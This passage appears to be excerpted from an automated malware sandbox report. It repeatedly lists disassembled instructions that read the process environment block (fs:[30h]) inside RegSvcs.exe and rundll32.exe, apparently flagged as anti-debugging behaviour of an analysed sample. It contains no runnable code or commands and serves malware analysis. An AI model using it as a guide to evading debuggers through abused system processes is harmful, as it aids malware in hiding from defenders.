          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FCFE3F mov eax, dword ptr fs:[00000030h]5_2_00FCFE3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1E620 mov eax, dword ptr fs:[00000030h]5_2_00F1E620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4A61C mov eax, dword ptr fs:[00000030h]5_2_00F4A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4A61C mov eax, dword ptr fs:[00000030h]5_2_00F4A61C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1C600 mov eax, dword ptr fs:[00000030h]5_2_00F1C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1C600 mov eax, dword ptr fs:[00000030h]5_2_00F1C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F1C600 mov eax, dword ptr fs:[00000030h]5_2_00F1C600
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F48E00 mov eax, dword ptr fs:[00000030h]5_2_00F48E00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FD1608 mov eax, dword ptr fs:[00000030h]5_2_00FD1608
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F537F5 mov eax, dword ptr fs:[00000030h]5_2_00F537F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F28794 mov eax, dword ptr fs:[00000030h]5_2_00F28794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F97794 mov eax, dword ptr fs:[00000030h]5_2_00F97794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F97794 mov eax, dword ptr fs:[00000030h]5_2_00F97794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F97794 mov eax, dword ptr fs:[00000030h]5_2_00F97794
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F2FF60 mov eax, dword ptr fs:[00000030h]5_2_00F2FF60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE8F6A mov eax, dword ptr fs:[00000030h]5_2_00FE8F6A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F2EF40 mov eax, dword ptr fs:[00000030h]5_2_00F2EF40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4E730 mov eax, dword ptr fs:[00000030h]5_2_00F4E730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F14F2E mov eax, dword ptr fs:[00000030h]5_2_00F14F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F14F2E mov eax, dword ptr fs:[00000030h]5_2_00F14F2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F3F716 mov eax, dword ptr fs:[00000030h]5_2_00F3F716
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FAFF10 mov eax, dword ptr fs:[00000030h]5_2_00FAFF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FAFF10 mov eax, dword ptr fs:[00000030h]5_2_00FAFF10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE070D mov eax, dword ptr fs:[00000030h]5_2_00FE070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00FE070D mov eax, dword ptr fs:[00000030h]5_2_00FE070D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4A70E mov eax, dword ptr fs:[00000030h]5_2_00F4A70E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 5_2_00F4A70E mov eax, dword ptr fs:[00000030h]5_2_00F4A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]15_2_050151BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]15_2_050151BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_050151BE mov eax, dword ptr fs:[00000030h]15_2_050151BE
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]15_2_05016DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]15_2_05016DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]15_2_05016DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016DC9 mov ecx, dword ptr fs:[00000030h]15_2_05016DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]15_2_05016DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016DC9 mov eax, dword ptr fs:[00000030h]15_2_05016DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]15_2_04FAB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]15_2_04FAB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]15_2_04FAB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAB02A mov eax, dword ptr fs:[00000030h]15_2_04FAB02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCBC2C mov eax, dword ptr fs:[00000030h]15_2_04FCBC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]15_2_04FC002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]15_2_04FC002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]15_2_04FC002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]15_2_04FC002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC002D mov eax, dword ptr fs:[00000030h]15_2_04FC002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_050241E8 mov eax, dword ptr fs:[00000030h]15_2_050241E8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05048DF1 mov eax, dword ptr fs:[00000030h]15_2_05048DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051C06 mov eax, dword ptr fs:[00000030h]15_2_05051C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]15_2_0506740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]15_2_0506740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0506740D mov eax, dword ptr fs:[00000030h]15_2_0506740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]15_2_05016C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]15_2_05016C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]15_2_05016C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016C0A mov eax, dword ptr fs:[00000030h]15_2_05016C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05064015 mov eax, dword ptr fs:[00000030h]15_2_05064015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05064015 mov eax, dword ptr fs:[00000030h]15_2_05064015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]15_2_05017016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]15_2_05017016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05017016 mov eax, dword ptr fs:[00000030h]15_2_05017016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]15_2_04F9B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]15_2_04F9B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9B1E1 mov eax, dword ptr fs:[00000030h]15_2_04F9B1E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h]15_2_04FAD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAD5E0 mov eax, dword ptr fs:[00000030h]15_2_04FAD5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]15_2_04FC1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]15_2_04FC1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC1DB5 mov eax, dword ptr fs:[00000030h]15_2_04FC1DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h]15_2_0502C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502C450 mov eax, dword ptr fs:[00000030h]15_2_0502C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h]15_2_04FC61A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC61A0 mov eax, dword ptr fs:[00000030h]15_2_04FC61A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC35A1 mov eax, dword ptr fs:[00000030h]15_2_04FC35A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h]15_2_04FCFD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCFD9B mov eax, dword ptr fs:[00000030h]15_2_04FCFD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2990 mov eax, dword ptr fs:[00000030h]15_2_04FC2990
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05061074 mov eax, dword ptr fs:[00000030h]15_2_05061074
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]15_2_04F92D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]15_2_04F92D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]15_2_04F92D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]15_2_04F92D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F92D8A mov eax, dword ptr fs:[00000030h]15_2_04F92D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05052073 mov eax, dword ptr fs:[00000030h]15_2_05052073
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCA185 mov eax, dword ptr fs:[00000030h]15_2_04FCA185
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBC182 mov eax, dword ptr fs:[00000030h]15_2_04FBC182
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]15_2_04FC2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]15_2_04FC2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]15_2_04FC2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2581 mov eax, dword ptr fs:[00000030h]15_2_04FC2581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05013884 mov eax, dword ptr fs:[00000030h]15_2_05013884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05013884 mov eax, dword ptr fs:[00000030h]15_2_05013884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h]15_2_04F9B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9B171 mov eax, dword ptr fs:[00000030h]15_2_04F9B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h]15_2_04FBC577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBC577 mov eax, dword ptr fs:[00000030h]15_2_04FBC577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9C962 mov eax, dword ptr fs:[00000030h]15_2_04F9C962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FB7D50 mov eax, dword ptr fs:[00000030h]15_2_04FB7D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD3D43 mov eax, dword ptr fs:[00000030h]15_2_04FD3D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h]15_2_04FBB944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBB944 mov eax, dword ptr fs:[00000030h]15_2_04FBB944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h]15_2_04FC513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC513A mov eax, dword ptr fs:[00000030h]15_2_04FC513A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]15_2_04FC4D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]15_2_04FC4D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC4D3B mov eax, dword ptr fs:[00000030h]15_2_04FC4D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9AD30 mov eax, dword ptr fs:[00000030h]15_2_04F9AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA3D34 mov eax, dword ptr fs:[00000030h]15_2_04FA3D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05068CD6 mov eax, dword ptr fs:[00000030h]15_2_05068CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]15_2_0502B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502B8D0 mov ecx, dword ptr fs:[00000030h]15_2_0502B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]15_2_0502B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]15_2_0502B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]15_2_0502B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502B8D0 mov eax, dword ptr fs:[00000030h]15_2_0502B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]15_2_04FB4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]15_2_04FB4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]15_2_04FB4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FB4120 mov eax, dword ptr fs:[00000030h]15_2_04FB4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FB4120 mov ecx, dword ptr fs:[00000030h]15_2_04FB4120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]15_2_05016CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]15_2_05016CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05016CF0 mov eax, dword ptr fs:[00000030h]15_2_05016CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]15_2_04F99100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]15_2_04F99100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F99100 mov eax, dword ptr fs:[00000030h]15_2_04F99100
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_050514FB mov eax, dword ptr fs:[00000030h]15_2_050514FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0506070D mov eax, dword ptr fs:[00000030h]15_2_0506070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0506070D mov eax, dword ptr fs:[00000030h]15_2_0506070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h]15_2_0502FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0502FF10 mov eax, dword ptr fs:[00000030h]15_2_0502FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA76E2 mov eax, dword ptr fs:[00000030h]15_2_04FA76E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2AE4 mov eax, dword ptr fs:[00000030h]15_2_04FC2AE4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC16E0 mov ecx, dword ptr fs:[00000030h]15_2_04FC16E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0505131B mov eax, dword ptr fs:[00000030h]15_2_0505131B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC36CC mov eax, dword ptr fs:[00000030h]15_2_04FC36CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2ACB mov eax, dword ptr fs:[00000030h]15_2_04FC2ACB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD8EC7 mov eax, dword ptr fs:[00000030h]15_2_04FD8EC7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h]15_2_04FAAAB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FAAAB0 mov eax, dword ptr fs:[00000030h]15_2_04FAAAB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCFAB0 mov eax, dword ptr fs:[00000030h]15_2_04FCFAB0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]15_2_04F952A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]15_2_04F952A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]15_2_04F952A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]15_2_04F952A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F952A5 mov eax, dword ptr fs:[00000030h]15_2_04F952A5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05068B58 mov eax, dword ptr fs:[00000030h]15_2_05068B58
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h]15_2_04FCD294
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCD294 mov eax, dword ptr fs:[00000030h]15_2_04FCD294
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05068F6A mov eax, dword ptr fs:[00000030h]15_2_05068F6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0504D380 mov ecx, dword ptr fs:[00000030h]15_2_0504D380
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD927A mov eax, dword ptr fs:[00000030h]15_2_04FD927A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]15_2_04FBAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]15_2_04FBAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]15_2_04FBAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]15_2_04FBAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBAE73 mov eax, dword ptr fs:[00000030h]15_2_04FBAE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0505138A mov eax, dword ptr fs:[00000030h]15_2_0505138A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]15_2_05017794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]15_2_05017794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05017794 mov eax, dword ptr fs:[00000030h]15_2_05017794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA766D mov eax, dword ptr fs:[00000030h]15_2_04FA766D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05065BA5 mov eax, dword ptr fs:[00000030h]15_2_05065BA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]15_2_04F99240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]15_2_04F99240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]15_2_04F99240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F99240 mov eax, dword ptr fs:[00000030h]15_2_04F99240
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]15_2_04FA7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]15_2_04FA7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]15_2_04FA7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]15_2_04FA7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]15_2_04FA7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA7E41 mov eax, dword ptr fs:[00000030h]15_2_04FA7E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_050153CA mov eax, dword ptr fs:[00000030h]15_2_050153CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_050153CA mov eax, dword ptr fs:[00000030h]15_2_050153CA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h]15_2_04FD4A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD4A2C mov eax, dword ptr fs:[00000030h]15_2_04FD4A2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9E620 mov eax, dword ptr fs:[00000030h]15_2_04F9E620
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h]15_2_04FCA61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCA61C mov eax, dword ptr fs:[00000030h]15_2_04FCA61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FB3A1C mov eax, dword ptr fs:[00000030h]15_2_04FB3A1C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]15_2_04F95210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F95210 mov ecx, dword ptr fs:[00000030h]15_2_04F95210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]15_2_04F95210
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F95210 mov eax, dword ptr fs:[00000030h]15_2_04F95210
